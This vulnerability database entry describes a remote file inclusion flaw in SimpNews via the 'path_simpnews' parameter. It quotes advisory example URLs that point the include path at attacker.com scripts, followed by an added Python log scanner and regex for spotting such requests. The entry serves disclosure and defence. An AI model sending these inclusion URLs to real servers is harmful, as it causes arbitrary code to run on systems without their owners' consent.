SimpNews 2.0.1/2.13 – ‘path_simpnews’ Remote File Inclusion

Vulnerability ID 1054040 Vulnerability type
Published 2003-07-18 Updated 2003-07-18
CVE ID N/A
CNNVD-ID N/A
Platform PHP CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/22927
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/8227/info

SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Under some PHP configurations, remote users may influence a SimpNews URI variable, path_simpnews. This variable is used in the include path for several SimpNews configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.

http://www.example.com/eventcal2.php.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
http://www.attacker.com/includes/has_entries.inc
or 
http://www.example.com/eventscroller.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
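
For defenders reviewing web server logs, the following is an added example (not part of the original advisory or of SimpNews) that flags requests where `path_simpnews` carries a URL rather than a local path. It goes beyond the two scripts listed above by checking every requested script. The log format (Apache combined), the sample lines and the host `remote.example` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "path_simpnews"  # parameter named in the advisory

# A legitimate include path is a local directory. A value that begins with a
# URL scheme (two or more characters, so "C:" drive letters are not matched),
# a protocol-relative "//" or a UNC "\\" prefix points at a remote include.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)

# Request line inside an access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def remote_include_attempts(log_lines):
    """Return (client_ip, script_path, value) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        # parse_qsl percent-decodes names and values, so encoded URLs match too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == PARAM and REMOTE_VALUE.match(value):
                hits.append((line.split()[0], target.path, value))
    return hits


# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2003:10:00:01 +0000] '
    '"GET /eventscroller.php?path_simpnews=http://remote.example/ HTTP/1.0" 200 512',
    '203.0.113.7 - - [18/Jul/2003:10:00:05 +0000] '
    '"GET /other.php?id=1&path_simpnews=ftp%3A%2F%2Fremote.example%2F HTTP/1.0" 200 512',
    '198.51.100.4 - - [18/Jul/2003:10:01:00 +0000] '
    '"GET /eventscroller.php?lang=en HTTP/1.0" 200 2048',
    '198.51.100.4 - - [18/Jul/2003:10:02:00 +0000] '
    '"GET /other.php?path_simpnews=./simpnews/ HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for ip, script, value in remote_include_attempts(SAMPLE_LOG):
        print(f"{ip} requested {script} with {PARAM}={value!r}")
```

Values sent in a POST body do not appear in the access log's request line, so this check covers query-string requests only.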
